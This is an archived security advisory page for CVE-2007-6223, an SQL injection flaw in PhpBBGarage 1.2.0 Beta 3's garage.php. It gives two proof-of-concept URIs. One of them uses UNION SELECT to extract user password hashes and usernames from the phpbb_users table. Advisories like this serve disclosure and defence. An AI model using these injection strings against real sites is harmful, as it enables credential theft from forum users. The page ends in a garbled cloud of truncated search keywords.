about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PhpBBGarage Garage.PHP SQL Injection Vulnerability


Title PhpBBGarage Garage.PHP SQL Injection Vulnerability
Published 2007-12-03-12:00AM
Updated 2008-03-13-02:51PM
Class Input Validation Error
CVE   CVE-2007-6223
Remote  Yes
Local  No
Credit  maku234 is credited with the discovery of this vulnerability.
Vulnerable  PhpBBGarage PhpBBGarage 1.2.0 Beta 3
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following URIs are available: http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 05:17:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.ENTELW awstat CMS is Fre www89.com adult sexy CMS is Fre CMS is Fre mambo Remo PHON EROTI web wiz fo photo sex www.Sex+wa gambar ade /modules/M nudegirl mambo Remo sex10 /search/ex Crack+Data www.nokia. search/exp m600i gambar ade 200 /compo news for c OpenSSH Bu e107 0.7.8 t999t Sexy ladie XxxPk Pop_Profil ftp users administra girl+s Www.ramba Sexsy.Movi mambo Remo sex10 Free mobil Sexsy.Movi mambo Remo Free mobil UW Imapd 2 news for C t999t Aishwarya php-nuke 2 FRee sexy Www.89.com www.masala